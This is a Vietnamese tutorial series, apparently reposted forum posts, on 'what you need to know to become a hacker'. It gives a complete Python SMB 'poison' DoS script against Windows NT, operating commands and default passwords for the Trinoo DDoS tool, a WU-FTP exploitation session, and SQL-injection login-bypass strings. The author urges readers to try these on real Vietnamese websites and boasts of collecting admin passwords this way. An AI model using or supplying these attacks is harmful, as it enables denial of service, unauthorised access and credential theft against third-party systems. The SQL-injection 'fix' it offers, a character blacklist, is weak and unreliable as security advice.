_ Cách tấn công UDP đòi hỏi phải có 2 hệ thống máy cùng tham gia. Hackers sẽ làm cho hệ thống của mình đi vào một vòng lặp trao đổi các dữ liệu qua giao thức UDP. Và giả mạo địa chỉ ip của các gói tin là địa chỉ loopback ( 127.0.0.1 ) , rồi gởi gói tin này đến hệ thống của nạn nhân trên cổng UDP echo ( 7 ). Hệ thống của nạn nhân sẽ trả lời lại các messages do 127.0.0.1( chính nó ) gởi đến , kết quả là nó sẽ đi vòng một vòng lặp vô tận. Tuy nhiên, có nhiều hệ thống không cho dùng địa chỉ loopback nên hacker sẽ giả mạo một địa chỉ ip của một máy tính nào đó trên mạng nạn nhân và tiến hành ngập lụt UDP trên hệ thống của nạn nhân . Nếu bạn làm cách này không thành công thì chính máy của bạn sẽ bị đấy .

h . ) Tấn công DNS :

_ Hacker có thể đổi một lối vào trên Domain Name Server của hệ thống nạn nhân rồi cho chỉ đến một website nào đó của hacker. Khi máy khách yêu cầu DNS phân tích địa chỉ bị xâm nhập thành địa chỉ ip, lập tức DNS ( đã bị hacker thay đổi cache tạm thờI ) sẽ đổi thành địa chỉ ip mà hacker đã cho chỉ đến đó . Kết quả là thay vì phải vào trang Web muốn vào thì các nạn nhân sẽ vào trang Web do chính hacker tạo ra . Một cách tấn công từ chối dịch vụ thật hữu hiệu !.

g . ) Distributed DoS Attacks ( DDos ) :

_ DDoS yêu cầu phải có ít nhất vài hackers cùng tham gia. Đầu tiên các hackers sẽ cố thâm nhập vào các mạng máy tính được bảo mật kém, sau đó cài lên các hệ thống này chương trình DDoS server. Bây giờ các hackers sẽ hẹn nhau đến thời gian đã định sẽ dùng DDoS client kết nối đến các DDoS servers, sau đó đồng loạt ra lệnh cho các DDoS servers này tiến hành tấn công DDoS đến hệ thống nạn nhân .

h . ) DRDoS ( The Distributed Reflection Denial of Service Attack ) :

_ Đây có lẽ là kiểu tấn công lợi hại nhất và làm boot máy tính của đối phương nhanh gọn nhất . Cách làm thì cũng tương tự như DDos nhưng thay vì tấn công bằng nhiều máy tính thì ngườI tấn công chỉ cần dùng một máy tấn công thông qua các server lớn trên thế giới . Vẫn với phương pháp giả mạo địa chỉ IP của victim , kẻ tấn công sẽ gởi các gói tin đến các server mạnh nhất , nhanh nhất và có đường truyền rộng nhất như Yahoo .v.v… , các server này sẽ phản hồi các gói tin đó đến địa chỉ của victim . Việc cùng một lúc nhận được nhiều gói tin thông qua các server lớn này sẽ nhanh chóng làm nghẽn đường truyền của máy tính nạn nhân và làm crash , reboot máy tính đó . Cách tấn công này lợi hại ở chỗ chỉ cần một máy có kết nối Internet đơn giản với đường truyền bình thường cũng có thể đánh bật được hệ thống có đường truyền tốt nhất thế giớI nếu như ta không kịp ngăn chặn . Trang Web HVA của chúng ta cũng bị DoS vừa rồi bởi cách tấn công này đấy .

40 . ) Kỹ thuật DoS Web bằng Python :

_ Kỹ thuật này chỉ có thể sử dụng duy nhất trên WinNT , và bạn cần phải có thời gian thì máy tính của nạn nhân mới bị down được .
_ Bạn hãy download Pyphon tại http://www.python.org/ để sử dụng .
_ Bạn hãy save đoạn mã sau lên file rfpoison.py .

CODE
import string
import struct
from socket import *
import sys
def a2b(s):
bytes = map(lambda x: string.atoi(x, 16),
string.split(s))
data = string.join(map(chr, bytes), ``)
return data
def b2a(s):
bytes = map(lambda x: `%.2x` % x, map(ord, s))
return string.join(bytes, ` `)

# Yêu cầu tập hợp NBSS
nbss_session = a2b(``````
81 00 00 48 20 43 4b 46 44 45
4e 45 43 46 44 45 46 46 43 46 47 45 46 46 43 43
41 43 41 43 41 43 41 43 41 43 41 00 20 45 48 45
42 46 45 45 46 45 4c 45 46 45 46 46 41 45 46 46
43 43 41 43 41 43 41 43 41 43 41 41 41 00 00 00
00 00
``````)

# Tạo SMB
crud = (
# Yêu cầu SMBnegprot
``````
ff 53 4d 42 72 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 00 01 00 00 81 00 02 50 43
20 4e 45 54 57 4f 52 4b 20 50 52 4f 47 52 41 4d
20 31 2e 30 00 02 4d 49 43 52 4f 53 4f 46 54 20
4e 45 54 57 4f 52 4b 53 20 31 2e 30 33 00 02 4d
49 43 52 4f 53 4f 46 54 20 4e 45 54 57 4f 52 4b
53 20 33 2e 30 00 02 4c 41 4e 4d 41 4e 31 2e 30
00 02 4c 4d 31 2e 32 58 30 30 32 00 02 53 61 6d
62 61 00 02 4e 54 20 4c 41 4e 4d 41 4e 20 31 2e
30 00 02 4e 54 20 4c 4d 20 30 2e 31 32 00
``````,
# Yêu cầu setup SMB X
``````
ff 53 4d 42 73 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 00 01 00 0d ff 00 00 00 ff
ff 02 00 f4 01 00 00 00 00 01 00 00 00 00 00 00
00 00 00 00 00 17 00 00 00 57 4f 52 4b 47 52 4f
55 50 00 55 6e 69 78 00 53 61 6d 62 61 00
``````,
# Yêu cầu SMBtconX
``````
ff 53 4d 42 75 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f4 01 00 08 01 00 04 ff 00 00 00 00
00 01 00 17 00 00 5c 5c 2a 53 4d 42 53 45 52 56
45 52 5c 49 50 43 24 00 49 50 43 00
``````,
# Yêu cầu khởI tạo SMBnt X
``````
ff 53 4d 42 a2 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 18 ff 00 00 00 00
07 00 06 00 00 00 00 00 00 00 9f 01 02 00 00 00
00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00
00 00 00 00 00 00 02 00 00 00 00 08 00 5c 73 72
76 73 76 63 00
``````,
# yêu cầu biên dịch SMB
``````
ff 53 4d 42 25 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 10 00 00 48 00 00
00 48 00 00 00 00 00 00 00 00 00 00 00 00 00 4c
00 48 00 4c 00 02 00 26 00 00 08 51 00 5c 50 49
50 45 5c 00 00 00 05 00 0b 00 10 00 00 00 48 00
00 00 01 00 00 00 30 16 30 16 00 00 00 00 01 00
00 00 00 00 01 00 c8 4f 32 4b 70 16 d3 01 12 78
5a 47 bf 6e e1 88 03 00 00 00 04 5d 88 8a eb 1c
c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00
``````,
# SMBtrans Request
``````
ff 53 4d 42 25 00
00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 08 f4 01 00 08 01 00 10 00 00 58 00 00
00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 4c
00 58 00 4c 00 02 00 26 00 00 08 61 00 5c 50 49
50 45 5c 00 00 00 05 00 00 03 10 00 00 00 58 00
00 00 02 00 00 00 48 00 00 00 00 00 0f 00 01 00
00 00 0d 00 00 00 00 00 00 00 0d 00 00 00 5c 00
5c 00 2a 00 53 00 4d 00 42 00 53 00 45 00 52 00
56 00 45 00 52 00 00 00 00 00 01 00 00 00 01 00
00 00 00 00 00 00 ff ff ff ff 00 00 00 00
``````
)
crud = map(a2b, crud)
def smb_send(sock, data, type=0, flags=0):
d = struct.pack(`!BBH`, type, flags, len(data))
#print `send:`, b2a(d+data)
sock.send(d+data)
def smb_recv(sock):
s = sock.recv(4)
assert(len(s) == 4)
type, flags, length = struct.unpack(`!BBH`, s)
data = sock.recv(length)
assert(len(data) == length)
#print `recv:`, b2a(s+data)
return type, flags, data
def nbss_send(sock, data):
sock.send(data)
def nbss_recv(sock):
s = sock.recv(4)
assert(len(s) == 4)
return s
def main(host, port=139):
s = socket(AF_INET, SOCK_STREAM)
s.connect(host, port)
nbss_send(s, nbss_session)
nbss_recv(s)
for msg in crud[:-1]:
smb_send(s, msg)
smb_recv(s)
smb_send(s, crud[-1]) # no response to this
s.close()
if __name__ == `__main__`:
print `Sending poison...`,
main(sys.argv[1])
print `done.`

Để có thể làm down được server của đối phương bạn cần phải có thời gian DoS , nếu không có điều kiện chờ đợi tốt nhất bạn không nên sử dụng cách này . Nhưng “vọc” thử cho biết thì được đúng không ?

41 . ) Tấn công DDoS thông qua Trinoo :

_ Bạn đã biết DDoS attack là gì rồi phải không ? Một cuộc tấn công DDoS bằng Trinoo được thực hiện bởi một kết nối của Hacker Trinoo Master và chỉ dẫn cho Master để phát động một cuộc tấn công DDoS đến một hay nhiều mục tiêu. Trinoo Master sẽ liên lạc với những Deadmons đưa những địa chỉ được dẫn đến để tấn công một hay nhiều mục tiêu trong khoảng thời gian xác định .
_ Cả Master và Deamon đều được bảo vệ bằng Passwd . chỉ khi chúng ta biết passwd thì mới có thể điều khiển được chúng , điều này không có gì khó khăn nếu chúng ta là chủ nhân thực sự của chúng . Những passwd này thường được mã hoá và bạn có thể thiết lập khi biên dịch Trinoo từ Source ----- > Binnary. Khi được chạy , Deadmons sẽ hiện ra một dấu nhắc và chờ passwd nhập vào , nếu passwd nhập sai nó sẽ tự động thoát còn nếu passwd được nhập đúng thì nó sẽ tự động chạy trên nền của hệ thống .

attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is `^]`.
kwijibo
Connection closed by foreign host. < == Bạn đã nhập sai

attacker$ telnet 10.0.0.1 27665
Trying 10.0.0.1
Connected to 10.0.0.1
Escape character is `^]`.
betaalmostdone
trinoo v1.07d2+f3+c..[rpm8d/cb4Sx/]
trinoo > < == bạn đã vào được hệ thống trinoo

_ Đây là vài passwd mặc định :

“l44adsl``: pass của trinoo daemon .
``gorave``: passwd của trinoo master server khi startup .
``betaalmostdone``: passwd điều khiển từ xa chung cho trinoo master .
``killme``: passwd trinoo master điều khiển lệnh ``mdie`` .

_ Đây là một số lệnh dùng để điều khiển Master Server:

CODE
die -------- ------------Shutdown.
quit ------- -------------Log off.
mtimer N ---------- --Đặt thờI gian để tấn công DoS , vớI N nhận giá trị từ 1-- > 1999 giây .
dos IP --------- ------Tấn công đến một địa chỉ IP xác định .
mdie pass ------- ----Vô hiệu hoá tất cả các Broadcast , nếu như passwd chính xác . Một lệnh đưọc gửi tới (``d1e l44adsl``) Broadcast để Shutdown chúng . Một passwd riêng biệt sẽ được đặt cho mục này
mping ------ ----------Gửi một lệnh ping tới (``png l44adsl``) c¸c Broadcast.
mdos --Send nhiều lênh DOS (``xyz l44adsl 123:ip1:ip2``) đến các Broadcast.
info ------- --------------Hiển thị thông tin về Trinoo .
msize ------ ------------Đặt kích thước đệm cho những gói tin được send đi trong suốt thờI gian DoS.
nslookup host ------X ác định tên thiết bị của Host mà Master Trinoo đang chạy .
usebackup -- ---------Chuyển tớI các file Broadcast sao lưu được tạo bởi lệnh “killdead”.
bcast ------ -------------Liệt kê danh sách tất cả các Broadcast có thể khai thác .
help [cmd] ----------- Đưa ra danh sách các lệnh .
mstop ------ -------------Ngừng lại các cuốc tấn công DOS .

_ Đây là một số lệnh dùng để điều khiển Trinoo Deadmons:

CODE
aaa pass IP --------- ---Tấn công đến địa chỉ IP đã xác định . GửI gói tin UDP (0-65534) đến cổng của UDP của địa chỉ IP đã xác định trong một khoảng thời gian xác định được mặc định là 120s hay từ 1-- > 1999 s .
bbb pass N ---------- ---Đặt thờI gian giới hạn cho các cuộc tấn công DOS .
Shi pass ------- ---------Gửi chuỗi “*HELLO*” tới dánh sách Master Server đã được biên dịch trong chương trình trên cổng 31335/UDP.
png pass ------- --------Send chuỗi “Pong” tớI Master Server phát hành các lệnh điều khiển trên cổng 31335/UDP.
die pass ------- ---------Shutdown Trinoo.
rsz N ---------- ----------Là kích thước của bộ đệm được dùng để tấn công , nó được tính bằng byte .
xyz pass 123:ip1:ip3 tấn công DOS nhiều mục tiêu cùng lúc .

( Dựa theo hướng dẫn của huynh Binhnx2000 )
Còn nhiều đoạn mã và cách ứng dụng để DoS lắm , các bạn chịu khó tìm hiểu thêm nhé . Nhưng đừng tấn công lung tung , nhất là server của HVA , coi chừng không thu được hiệu quả mà còn bị lock nick nữa đó

Hết phần 6

Những Hiểu Biết Cơ Bản Để Trở Thành Hacker (phần V)

2007-06-19T01:16:00.003-07:00

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 5 31 . )

Gói tin TCP/IP là gì?

TCP/IP viết tắt cho Transmission Control Protocol and Internet Protocol, một Gói tin TCP/IP là một khối dữ liệu đã được nén, sau đó kèm thêm một header và gửi đến một máy tính khác. Đây là cách thức truyền tin của internet, bằng cách gửi các gói tin. Phần header trong một gói tin chứa địa chỉ IP của người gửi gói tin. Bạn có thể viết lại một gói tin và làm cho nó trong giống như đến từ một người khác!! Bạn có thể dùng cách này để tìm cách truy nhập vào rất nhiều hệ thống mà không bị bắt. Bạn sẽ phải chạy trên Linux hoặc có một chương trình cho phép bạn làm điều này.

32 . ) Linux là gi`:

_Nói theo nghĩa gốc, Linux là nhân ( kernel ) của HĐH. Nhân là 1 phần mềm đảm trách chức vụ liên lạc giữa các chương trình ứng dụng máy tính và phần cứng. Cung cấp các chứng năng như: quản lý file, quản lý bộ nhớ ảo, các thiết bị nhập xuất nhưng ổ cứng, màn hình, bàn phím, .... Nhưng Nhân Linux chưa phải là 1 HĐH, vì thế nên Nhân Linux cần phải liên kết với những chương trình ứng dụng được viết bởi tổ chức GNU tạo lên 1 HĐH hoàn chỉnh: HĐH Linux. Đây cũng là lý do tại sao chúng ta thấy GNU/Linux khi được nhắc đến Linux.
Tiếp theo, 1 công ty hay 1 tổ chức đứng ra đóng gói các sản phẩm này ( Nhân và Chương trình ứng dụng ) sau đó sửa chữa một số cấu hình để mang đặc trưng của công ty/ tổ chức mình và làm thêm phần cài đặt ( Installation Process ) cho bộ Linux đó, chúng ta có : Distribution. Các Distribution khác nhau ở số lượng và loại Software được đóng gói cũng như quá trình cài đặt, và các phiên bản của Nhân. 1 số Distribution lớn hiện nay của Linux là : Debian, Redhat, Mandrake, SlackWare, Suse .

33 . ) Các lệnh căn bản cần biết khi sử dụng hoặc xâm nhập vào hệ thống Linux :

_ Lệnh `` man`` : Khi bạn muốn biết cách sử dụng lệnh nào thì có thể dùng tới lệnh nay :
Cấu trúc lệnh : $ man .
Ví dụ : $ man man
_ Lệnh `` uname ``: cho ta biết các thông tin cơ bản về hệ thống
Ví dụ : $uname -a ; nó sẽ đưa ra thông tin sau :

Linux gamma 2.4.18 #3 Wed Dec 26 10:50:09 ICT 2001 i686 unknown

_ Lệnh id : xem uid/gid hiện tại ( xem nhóm và tên hiện tại )

_ Lệnh w : xem các user đang login và action của họ trên hệ thống .
Ví Dụ : $w nó sẽ đưa ra thông tin sau :

10:31pm up 25 days, 4:07, 18 users, load average: 0.06, 0.01, 0.00

_ Lệnh ps: xem thông tin các process trên hệ thống
Ví dụ : $ps axuw
_ Lệnh cd : bạn muốn di chuyển đến thư mục nào . phải nhờ đến lệnh này .
Ví du : $ cd /usr/bin ---- > nó sẽ đưa bạn đến thư mục bin
_ Lệnh mkdir : tạo 1 thư mục .
Ví dụ : $ mkdir /home/convit --- > nó sẽ tạo 1 thư mục convit trong /home
_ Lệnh rmdir : gỡ bỏ thư mục
Ví dụ : $ rmdir /home/conga ---- > nó sẽ gỡ bỏ thư mục conga trong /home .
_ Lệnh ls: liệt kê nội dung thư mục
Ví dụ : $ls -laR /
_ Lệnh printf: in dữ liệu có định dạng, giống như sử dựng printf() của C++ .
Ví dụ : $printf %s ``\x41\x41\x41\x41``
_ Lệnh pwd: đưa ra thư mục hiện hành
Ví dụ : $pwd ------ > nó sẽ cho ta biết vị trí hiện thời của ta ở đâu : /home/level1
_ Các lệnh : cp, mv, rm có nghĩa là : copy, move, delete file
Ví dụ với lệnh rm (del) : $rm -rf /var/tmp/blah ----- > nó sẽ del file blah .
Làm tương tự đối với các lệnh cp , mv .
_ Lệnh find : tìm kiếm file, thư mục
Ví dụ : $find / -user level2
_ Lệnh grep: công cụ tìm kiếm, cách sử dụng đơn giản nhất : grep ``something``
Vidu : $ps axuw | grep ``level1``
_ Lệnh Strings: in ra tất cả các ký tự in được trong 1 file. Dùng nó để tìm các khai báo hành chuỗi trong chương trình, hay các gọi hàm hệ thống, có khi tìm thấy cả password nữa
VD: $strings /usr/bin/level1
_ Lệnh strace: (linux) trace các gọi hàm hệ thống và signal, cực kỳ hữu ích để theo dõi flow của chương trình, cách nhanh nhất để xác định chương trình bị lỗi ở đoạn nào. Trên các hệ thống unix khác, tool tương đương là truss, ktrace .
Ví dụ : $strace /usr/bin/level1
_ Lệnh`` cat, more ``: in nội dung file ra màn hình

$cat /etc/passwd | more -- > nó sẽ đưa ra nội dung file passwd một cách nhanh nhất .
$more /etc/passwd ---- > Nó sẽ đưa ra nội dung file passwd một cách từ từ .

_ Lệnh hexdump : in ra các giá trị tương ứng theo ascii, hex, octal, decimal của dữ liệu nhập vào .
Ví dụ : $echo AAAA | hexdump
_ Lệnh : cc, gcc, make, gdb: các công cụ biên dịch và debug .
Ví dụ : $gcc -o -g bof bof.c
Ví dụ : $make bof
Ví dụ : $gdb level1
(gdb) break main
(gdb) run
_ Lệnh perl: một ngôn ngữ
Ví dụ : $perl -e `print ``A``x1024` | ./bufferoverflow ( Lỗi tràn bộ đệm khi ta đánh vào 1024 kí tự )
_ Lệnh ``bash`` : đã đến lúc tự động hoá các tác vụ của bạn bằng shell script, cực mạnh và linh hoạt .
Bạn muốn tìm hiểu về bash , xem nó như thế nào :
$man bash
_ Lệnh ls : Xem nội dung thư mục ( Liệt kê file trong thư mục ) .
Ví Dụ : $ ls /home ---- > sẽ hiện toàn bộ file trong thư mục Home
$ ls -a ----- > hiện toàn bộ file , bao gồm cả file ẩn
$ ls -l ----- > đưa ra thông tin về các file
_ Lệnh ghi dữ liệu đầu ra vào 1 file :
Vídụ : $ ls /urs/bin > ~/convoi ------ > ghi dữ liệu hiển thị thông tin của thư mục bin vào 1 file convoi .

34 . ) Những hiểu biết cơ bản xung quanh Linux :

a . ) Một vài thư mục quan trọng trên server :

_ /home : nơi lưu giữ các file người sử dụng ( VD : người đăng nhập hệ thống có tên là convit thì sẽ có 1 thư mục là /home/convit )
_ /bin : Nơi xử lý các lệnh Unix cơ bản cần thiết như ls chẳng hạn .
_ /usr/bin : Nơi xử lý các lệnh dặc biệt khác , các lệnh dùng bởi người sử dụng đặc biệt và dùng quản trị hệ thống .
_ /bot : Nơi mà kernel và các file khác được dùng khi khởi động .
_ /ect : Các file hoạt động phụ mạng , NFS (Network File System ) Thư tín ( Đây là nơi trọng yếu mà chúng ta cần khai thác nhiều nhất )
_ /var : Các file quản trị
_ /usr/lib : Các thư viện chuẩn như libc.a
_ /usr/src : Vị trí nguồn của các chương trình .

b . ) Vị trí file chứa passwd của một số phiên bản khác nhau :

CODE
AIX 3 /etc/security/passwd !/tcb/auth/files//
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Ren /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files//
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 /etc/shadow
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *

35 . ) Khai thác lỗi của Linux qua lỗ hổng bảo mật của WU-FTP server :

_ WU-FTP Server (được phát triển bởi đại Học Washington ) là một phần mềm Server phục vụ FTP được dùng khá phổ biến trên các hệ thống Unix & Linux ( tất cả các nhà phân phối: Redhat, Caldera, Slackware, Suse, Mandrake....) và cả Windows.... , các hacker có thể thực thi các câu lệnh của mình từ xa thông qua file globbing bằng cách ghi đè lên file có trên hệ thống .
_ Tuy nhiên , việc khai thác lỗi này không phảI là dễ vì nó phải hội đủ những điều kiện sau :
+ Phải có account trên server .
+ Phải đặt được Shellcode vào trong bộ nhớ Process của Server .
+ Phải gửi một lệnh FTP đặc biệt chứa đựng một globbing mẫu đặc biệt mà không bị server phát hiện có lỗi .
+ Hacker sẽ ghi đè lên một Function, Code tới một Shellcode, có thể nó sẽ được thực thi bới chính Server FTP .
_ Ta hãy phân tích VD sau về việc ghi đè lên file của server FTP :

CODE
ftp > open localhost <== lệnh mở trang bị lỗi .
Connected to localhost (127.0.0.1).
220 sasha FTP server (Version wu-2.6.1-18) ready <== xâm nhập thành công FTP server .
Name (localhost:root): anonymous <== Nhập tên chỗ này
331 Guest login ok, send your complete e-mail address as password.
Password:………..<== nhập mật khẩu ở đây
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files. <== sử dụng biến nhị phân để chuyển đổi file .
ftp > ls ~{ <== lệnh liệt kê thư mục hiện hành .
227 Entering Passive Mode (127,0,0,1,241,205)
421 Service not available, remote server has closed connection
1405 ? S 0:00 ftpd: accepting connections on port 21 ç chấp nhận kết nốI ở cổng 21 .
7611 tty3 S 1:29 gdb /usr/sbin/wu.ftpd
26256 ? S 0:00 ftpd:
sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
26265 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 26256
Attaching to program: /usr/sbin/wu.ftpd, process 26256 <== khai thác lỗi Wu.ftpd .
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i686/libc.so.6
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x40165544 in __libc_read () from /lib/i686/libc.so.6
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
__libc_free (mem=0x61616161) at malloc.c:3136
3136 in malloc.c

Việc khai thác qua lỗi này đến nay tôi test vẫn chưa thành công ( chẳng biết làm sai chỗ nào ) . Vậy bạn nào làm được hãy post lên cho anh em biết nhé .
Lỗi Linux hiện nay rất ít ( đặc biệt là đối với Redhat ), các bạn hãy chờ đợi nếu có lỗi gì mới thì bên “LỗI bảo mật” sẽ cập nhật ngay . Khai thác chúng như thế nào thì hỏi Mod quản lý bên đó , đặc biệt là bạn Leonhart , cậu ta siêng trả lời các bạn lắm .

( Dựa theo bài viết của huynh Binhnx2000 )

36 . ) Tìm hiểu về SQL Injection :

_ SQL Injection là một trong những kiểu hack web đang dần trở nên phổ biến hiện nay. Bằng cách inject các mã SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và password, thi hành lệnh từ xa, đoạt dữ liệu và lấy root của SQL server. Công cụ dùng để tấn công là một trình duyệt web bất kì, chẳng hạn như Internet Explorer, Netscape, Lynx, ...
_ Bạn có thể kiếm được trang Web bị lỗi bằng cách dùng các công cụ tìm kiếm để kiếm các trang cho phép submit dữ liệu . Một số trang Web chuyển tham số qua các khu vực ẩn nên bạn phảI viewsource mớI thấy được . VD ta xác định được trang này sử dụng Submit dữ liệu nhờ nhìn vào mã mà ta đã viewsource :

CODE

_ Kiểm tra thử xem trang Web có bị lỗi này hay không bằng cách nhập vào login và pass lân lượt như sau :

- Login: hi` or 1=1--
- Pass: hi` or 1=1--

Nếu không được bạn thử tiếp với các login và pass sau :

CODE
` or 1=1--
`` or 1=1--
or 1=1--
` or `a`=`a
`` or ``a``=``a
`) or (`a`=`a

Nếu thành công, bạn có thể login vào mà không cần phải biết username và password .
Lỗi này có dính dáng đến Query nên nếu bạn nào đã từng học qua cơ sở dữ liệu có thể khai thác dễ dàng chỉ bằng cách đánh các lệnh Query trên trình duyệt của các bạn . Nếu các bạn muốn tìm hiểu kỹ càng hơn về lỗi này có thể tìm các bài viết của nhóm vicky để tìm hiểu thêm .

37 . ) Một VD về hack Web thông qua lỗi admentor ( Một dạng của lỗi SQL Injection ) :

_ Trước tiên bạn vào google.com tìm trang Web admentor bằng từ khoá “allinurl : admentor” .
_ Thông thường bạn sẽ có kết quả sau :

http://www.someserver.com/admentor /admin/admin.asp

_ Bạn thử nhập “ ` or ``=` ” vào login và password :

CODE
Login : ` or ``=`
Password : ` or ``=`

_ Nếu thành công bạn sẽ xâm nhập vào Web bị lỗi với vai trò là admin .
_ Ta hãy tìm hiểu về cách fix lỗi này nhé :
+ Lọc các ký tự đặc biệt như “ ` `` ~ \ ” bằng cách chêm vào javascrip đoạn mã sau :

CODE
function RemoveBad(strTemp)
{
strTemp = strTemp.replace(/\<|\ > |\``|\`|\%|\;|$|$|\&|\+|
\-/g,````);
return strTemp;
}

+ Và gọi nó từ bên trong của asp script :

CODE
var login = var TempStr = RemoveBad
(Request.QueryString(``login``));
var password = var TempStr = RemoveBad
(Request.QueryString(``password``));

- Vậy là ta đã fix xong lỗi .

- Các bạn có thể áp dụng cách hack này cho các trang Web khác có submit dữ liệu , các bạn hãy test thử xem đi , các trang Web ở Việt Nam mình bị nhiều lắm , tôi đã kiếm được kha khá pass admin bằng cách thử này rồi ( nhưng cũng đã báo để họ fix lại ) .
- Có nhiều trang khi login không phải bằng “ ` or ``=’ ” mà bằng các nick name có thật đã đăng ký trên trang Web đó , ta vào link “thành viên” kiếm nick của một admin để test thử nhé .
Hack vui vẻ .

Ở phần 6 tôi sẽ đề cập đến kiểu tấn công từ chối dịch vụ ( DoS attack ) , một kiểu tấn công lợi hại đã làm cho trang Web hùng mạnh như HVA của chúng ta bị tắt nghẽn chỉ trong thờI gian ngắn các admin bận đi uống cafe hết mà không ai trông coi . Kèm theo đó là các phương pháp tấn công DoS đã và đang được sử dụng .

GOOKLUCK!!!!!!!!!!!!!!!!!!!!

( Hết phần 5 )

Những Hiểu Biết Cơ Bản Để Trở Thành Hacker (phần IV)

2007-06-19T01:16:00.001-07:00

Những hiểu biết cơ bản nhất để trở thành Hacker - Phần 4

26 . ) Tìm hiểu về RPC (Remote Procedure Call) :

_ Windows NT cung cấp khả năng sử dụng RPC để thực thi các ứng dụng phân tán . Microsoft RPC bao gồm các thư viện và các dịch vụ cho phép các ứng dụng phân tán hoạt động được trong môi trường Windows NT. Các ứng dụng phân tán chính bao gồm nhiều tiến trình thực thi với nhiệm vụ xác định nào đó. Các tiến trình này có thể chạy trên một hay nhiều máy tính.

_Microsoft RPC sử dụng name service provider để định vị Servers trên mạng. Microsoft RPC name service provider phải đi liền với Microsoft RPC name service interface (NIS). NIS bao bao gồm các hàm API cho phép truy cập nhiều thực thể trong cùng một name service database (name service database chứa các thực thể, nhóm các thực thể, lịch sử các thực thể trên Server).
Khi cài đặt Windows NT, Microsoft Locator tự động được chọn như là name service provider. Nó là name service provider tối ưu nhất trên môi trường mạng Windows NT.

27 . ) Kỹ thuật đơn giản để chống lại sự xâm nhập trái phép khi đang online thông qua RPC (Remote Procedure Call) :

_ Nếu bạn nghi ngờ máy của mình đang có người xâm nhập hoặc bị admin remote desktop theo dõi , bạn chỉ cần tắt chức năng remote procedure call thì hiện tại không có chương trình nào có thể remote desktop để theo dõi bạn được . Nó còn chống được hầu hết tools xâm nhập vào máy ( vì đa số các tools viết connect dựa trên remote procedure call ( over tcp/ip )).Các trojan đa số cũng dựa vào giao thức này.

Cách tắt: Bạn vào service /remote procedure call( click chuột phải ) chọn starup typt/disable hoặc manual/ apply.

Đây là cách chống rất hữu hiệu với máy PC , nếu thêm với cách tắt file sharing thì rất khó bị hack ) ,nhưng trong mạng LAN bạn cũng phiền phức với nó không ít vì bạn sẽ không chạy được các chương trình có liên quan đến thiết bị này . Tùy theo cách thức bạn làm việc mà bạn có cách chọn lựa cho hợp lý . Theo tôi thì nếu dùng trong mạng LAN bạn hãy cài một firewall là chắc chắn tương đối an toàn rồi đó .

( Dựa theo bài viết của huynh “Đời như củ khoai ” khoaimi – admin của HVA )

28 . ) Những bước để hack một trang web hiện nay :

_ Theo liệt kê của sách Hacking Exposed 3 thì để hack một trang Web thông thường ta thực hiện những bước sau :
+ FootPrinting : ( In dấu chân )
Đây là cách mà hacker làm khi muốn lấy một lượng thông tin tối đa về máy chủ/doanh nghiệp/người dùng. Nó bao gồm chi tiết về địa chỉ IP, Whois, DNS ..v.v đại khái là những thong tin chính thức có lien quan đến mục tiêu. Nhiều khi đơn giản hacker chỉ cần sử dụng các công cụ tìm kiếm trên mạng để tìm những thong tin đó.
+ Scanning : ( Quét thăm dò )
Khi đã có những thông tin đó rồi, thì tiếp đến là đánh giá và định danh những những dịch vụ mà mục tiêu có. Việc này bao gồm quét cổng, xác định hệ điều hành, .v.v.. Các công cụ được sử dụng ở đây như nmap, WS pingPro, siphon, fscam và còn nhiều công cụ khác nữa.
+ Enumeration : ( liệt kê tìm lỗ hổng )
Bước thứ ba là tìm kiếm những tài nguyên được bảo vệ kém, hoạch tài khoản người dùng mà có thể sử dụng để xâm nhập. Nó bao gồm các mật khẩu mặc định, các script và dịch vụ mặc định. Rât nhiều người quản trị mạng không biết đến hoặc không sửa đổi lại các giá trị này.
+ Gaining Access: ( Tìm cách xâm nhập )
Bây giờ kẻ xâm nhập sẽ tìm cách truy cập vào mạng bằng những thông tin có được ở ba bước trên. Phương pháp được sử dụng ở đây có thể là tấn công vào lỗi tràn bộ đệm, lấy và giải mã file password, hay thô thiển nhất là brute force (kiểm tra tất cả các trường hợp) password. Các công cụ thường được sử dụng ở bước này là NAT, podium, hoặc L0pht.
+ Escalating Privileges : ( Leo thang đặc quyền )
